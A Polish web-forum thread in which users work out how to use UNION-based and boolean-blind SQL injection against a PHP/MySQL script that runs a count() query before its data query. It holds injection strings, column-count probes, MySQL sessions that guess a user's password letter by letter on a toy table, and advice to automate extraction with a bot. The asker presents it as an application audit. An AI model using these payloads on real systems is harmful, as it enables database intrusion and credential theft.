sqlinjection z union Opcje

[nospor]

Pytanie teoretyczne:
czy jest możliwość wstawienia zapytania z union, do następującej teoretycznej sytuacji:

skrypt niezabezpieczony w zaden sposob przed sqlinjection, mozna wkladac co nam się chce.

wykonywane zapytanie:

[SQL] pobierz, plaintext 
SELECT cos, cos2, cos3 FROM tabela WHERE pole = 'cosZforma';
[SQL] pobierz, plaintext 

gdzie cosZforma to dana, która moze w formularzu dowolnie modyfikowac.

Chcac wstawic uniona, wystarczy wiec za cosZforma wstawic:
' union select c1,c2,c3 from innatabela where '1=1
w rezulatacie otrzymamy poprawne zapytanie z union

[SQL] pobierz, plaintext 
SELECT cos, cos2, cos3 FROM tabela WHERE pole = '' UNION SELECT c1,c2,c3 FROM innatabela WHERE '1=1';
[SQL] pobierz, plaintext 

pojawia sie jednak problem, gdyz nasze glowne zapytanie poprzedzane jest zapytaniem zliczającym, czyli

[SQL] pobierz, plaintext 
SELECT count(*) FROM tabela WHERE pole = 'cosZforma';
[SQL] pobierz, plaintext 

w rezulatacie po wstawieniu naszej zmiennej otrzymamy

[SQL] pobierz, plaintext 
SELECT count(*) FROM tabela WHERE pole = '' UNION SELECT c1,c2,c3 FROM innatabela WHERE '1=1';
[SQL] pobierz, plaintext 

Co wywali nam zapytanie, gdyz union dostarczy nam inną liczbę kolumn.
Skrypt dalej sie nie wykona, bo zapytanie z count(*) zwraca nam false i nie jedziemy dalej.

Czy istnieje jakies ominiecie tego? By w jednym ciągu zawrzec zarówna jedną kolumne i kilka kolumn? Tak by przeszlo zarowno przez zapytanie z count() jak i drugie pobierające dane?

ps: nie chce nikogo hackowac. Interesuje mnie, czy jest to możliwe.

[pyro]

Hmmm... nie wiem jak z UNION'em ale wydaje mi się ze w ten sposob się nie da... za to można zrobić inne ciekawe sztuczki w ten sposób... pozwól że za chwilę zupdatuje posta z małym przykładem.

// EDIT

[SQL] pobierz, plaintext 
mysql> CREATE TABLE users(id int NOT NULL AUTO_INCREMENT PRIMARY KEY, login char
(10), pass char(10));
Query OK, 0 rows affected (0.09 sec)
 
mysql> INSERT INTO users VALUES(NULL, 'wujek', 'crimson');
Query OK, 1 row affected (0.05 sec)
 
mysql> INSERT INTO users VALUES(NULL, 'ciocia', 'pirate');
Query OK, 1 row affected (0.00 sec)
 
mysql> INSERT INTO users VALUES(NULL, 'synek', 'passik');
Query OK, 1 row affected (0.01 sec)
 
mysql> CREATE TABLE articles(article_id int NOT NULL AUTO_INCREMENT PRIMARY KEY,
 article_body longtext);
Query OK, 0 rows affected (0.02 sec)
 
mysql> INSERT INTO articles SET article_id=NULL, article_body='To jest przyklado
wy artykul';
Query OK, 1 row affected (0.08 sec)
 
mysql> SELECT * FROM articles;
+------------+-----------------------------+
| article_id | article_body                |
+------------+-----------------------------+
|          1 | TO jest przykladowy artykul |
+------------+-----------------------------+
1 row IN SET (0.00 sec)
 
mysql> SELECT count(*) FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'c%') = 'wujek';
+----------+
| count(*) |
+----------+
|        1 |
+----------+
1 row IN SET (0.00 sec)
 
mysql> SELECT count(*) FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'ca%') = 'wujek';
+----------+
| count(*) |
+----------+
|        0 |
+----------+
1 row IN SET (0.00 sec)
 
mysql> SELECT count(*) FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'cw%') = 'wujek';
+----------+
| count(*) |
+----------+
|        0 |
+----------+
1 row IN SET (0.00 sec)
 
mysql> SELECT count(*) FROM articles WHERE article_id = '' OR (SELECT login FROM users WHERE login = 'wujek' AND pass LIKE 'cr%') = 'wujek';
+----------+
| count(*) |
+----------+
|        1 |
+----------+
1 row IN SET (0.00 sec)
 
mysql> # I tak dalej mozna odgadnac haslo konkretnego/niekonkretnego usera z zupelnie innej tabeli :)
mysql>
[SQL] pobierz, plaintext 

Ten post edytował pyro 16.02.2009, 18:30:10

[nospor]

ok
Chodzi mi głównie, czy moge w ten sposob pobrac dane z innej tabeli.

[BaN]

Można spróbować zastosować jakąś funkcję np. CONCAT(), też zwróci jeden wynik

[nospor]

@BaN tak, ale wowczas zapytanie wylozy sie na drugim etapie (normalny select) - wowczas tam nie bedzie sie zgadzala liczba kolumn

[pyro]

tak, ale wowczas zapytanie wylozy sie na drugim etapie (normalny select) - wowczas tam nie bedzie sie zgadzala liczba kolumn

A zajrzałeś do mojego postu?

// edit

aaa sorry, nie zauwazylem roznic czasowych, pobierac z innych mozna, wsytarczy spojrzec na moj ostatni post.

Ten post edytował pyro 16.02.2009, 18:33:13

[nospor]

@pyro o tym, ze w ten sposob mozna pobrac to wiem
Chodzilo mi o przyspieszenie tego etapu i dlatego chciałem dodać union. Gdyby nie te count() to bez problemu bym pobral, ale count() mnie zalatwia - dlatego zastanawiam sie czy mozna jakies uniwersalne zapytanie przy uzyciu np. IF napisac

[pyro]

@pyro o tym, ze w ten sposob mozna pobrac to wiem
Chodzilo mi o przyspieszenie tego etapu i dlatego chciałem dodać union. Gdyby nie te count() to bez problemu bym pobral, ale count() mnie zalatwia - dlatego zastanawiam sie czy mozna jakies uniwersalne zapytanie przy uzyciu np. IF napisac

no raczej by się to sprowadzało do tego samego... Poza tym w ten sposób  możesz wyciągnąć dowolne dane w szybki sposob, wystarczy bot na kilkanascie,dziesiąt linijek i automatycznie bedzie dane podstawiał

[BaN]

Raczej się nie wyłoży, chyba, że czegoś nie rozumiem

Załóżmy, że nazwy kolumn w tej tabeli `innatabela` to c1, c2, c3

Do pola formularza można wpisać:

Kod

' LIMIT 0 UNION SELECT CONCAT(c1, SPACE(1), c2, SPACE(1), c3) FROM innatabela LIMIT 1

Zatem zapytanie będzie następujące:

[SQL] pobierz, plaintext 
SELECT count(*) FROM tabela WHERE pole = '' LIMIT 0  UNION SELECT CONCAT(c1, SPACE(1), c2, SPACE(1), c3) FROM innatabela LIMIT 1
[SQL] pobierz, plaintext 

I powinno zwrócić wartości pól c1, c2, c3 oddzielone spacjami, o ile oczywiście pola w tej tabeli tak się nazywają

[nospor]

no raczej by się to sprowadzało do tego samego...

No nie, bo jakby udalo by sie spreparowac zapytanie, ktore za pierwszym razem zwroci jedną kolumne, a za drugim kilka, - to juz jestem w domu. Niestety uzycie IF na SELECT nie zdaje rezultatu

wystarczy bot na kilkanascie,dziesiąt linijek i automatycznie bedzie dane podstawiał

To tez wiem. Ale uczepilem sie tego uniona i basta

@BaN no tak, to dla przypadku z count(). Ale wstaw to sobie teraz do tego zapytania

[SQL] pobierz, plaintext 
SELECT cos, cos2, cos3 FROM tabela WHERE pole = 'cosZforma';
[SQL] pobierz, plaintext 

Twoj union zwraca tylko jedno pole, a teraz potrzeba trzech

[pyro]

Jeżeli w kodzie PHP  jest to interpretowane w ten sposob:

[PHP] pobierz, plaintext 
<?php
$blah = mysql_fetch_row($zapytanie);
 
 
if($blah[0] == 0)
{
// nie  ma artykulow ;(
}
else
{
// znaleziono x artykulow
}
?>
[PHP] pobierz, plaintext 

to w takim wypadku raczej union na niewiele się zdziała, jeśli jednak w kodzie php jest to interpretowane tak: (nie ma potrzeby tak robic, ale widzialem skrypty w ktorych ludzie mimo to dają wynik do while() )

[PHP] pobierz, plaintext 
<?php
while($blah = mysql_fetch_row($zapytanie))
{
$znalezionych = $blah[0];
 
 
 
}
?>
[PHP] pobierz, plaintext 

To w takim wypadku wystarczy dodać najzwyklejsze UNION, wtedy druga wartośc nadpisze pierwszą (tą z count), a tą drugą wartością bedą dane wyciągnięte z użycią UNION

Ten post edytował pyro 16.02.2009, 19:00:34

[nospor]

nie, jest tak jak pisalem:
najpierw w php jest zapytanie z count()
a potem w php jest zapytanie pobierające dane normalnym selectem.

Jesli dostosujemy union do drugiego zapytania, to wywali nam sie na pierszym.
Jak dostosujemy do pierwszego to wywali nam sie na drugim.

wywali, czyli poleci wyjatek w php i skrypt konczy dzialanie.

[BaN]

Twoj union zwraca tylko jedno pole, a teraz potrzeba trzech

Zatem na początku należy wyznaczyć liczbę kolumn w pierwszym zapytaniu SELECT

Moim zdaniem można to zrobić następująco:

sprawdzamy czy jest jedno pole:

Kod

' LIMIT 0 UNION SELECT 1

sprawdzamy czy są dwa pole:

Kod

' LIMIT 0 UNION SELECT 1,2

itd.

Po znalezieniu liczby pól można chyba zastosować rozwiązanie, które proponowałem

[pyro]

[SQL] pobierz, plaintext 
mysql> SELECT count(*) FROM articles WHERE article_id=192048 UNION SELECT concat
(login,' : ',pass) FROM users WHERE login = 'wujek';
+-----------------+
| count(*)        |
+-----------------+
| 0               |
| wujek : crimson |
+-----------------+
2 rows IN SET (0.05 sec)
 
mysql>
[SQL] pobierz, plaintext 

W przypadku z while() powinno zwrocic login i haslo, czyli na stronie by się pojawiło coś w stylu:

Znaleziono artykułów: wujek : crimson

Chyba że ten ostatni post nie do mnie

[nospor]

Chyba że ten ostatni post nie do mnie

No chyba nie

@BaN chyba nadal nie rozumiesz w czym rzecz

No dobra, zakładam więc że się nie da. Dziękuję panom za dyskusję, pozostaje więc pisac bota

[pyro]

No chyba nie

@BaN chyba nadal nie rozumiesz w czym rzecz

No dobra, zakładam więc że się nie da. Dziękuję panom za dyskusję, pozostaje więc pisac bota

Lub dodać najzwyklejsze union jesli zapytanie przechodzi przez pętle...


To zabawne, że w Twoim poście czuć nutkę chęci d wykorzystania tego gdzieś :P

[nospor]

Lub dodać najzwyklejsze union jesli zapytanie przechodzi przez pętle...

No tlumacze ci przecież, ze przechodzi przez dwa zapytania. Jak dopasujesz go do pierwszego to wylozy sie na drugim. Jak dopasujesz go do drugiego to wylozy sie na pierwszym.

mysql_query() zwraca ci blad i juz skrypt nie dochodzi do zadnych petli.

To zabawne, że w Twoim poście czuć nutkę chęci d wykorzystania tego gdzieś

Nic z tych rzeczy. Przeprowadzam audyt aplikacji. Dziurawa jak ser szwajcarski. Bez problemu moge wydobyc każde dane z tabel, poprzez napisanie bota, o którym juz rozmawialismy. Zastanawialem sie jednak, czy w opisanej przeze mnie sytujacji mozna to zrobic szybciej i przyjemniej
I gdyby nie to zapytanie z count() to nie bylo by problemu. Jednak ono komplikuje sprawę.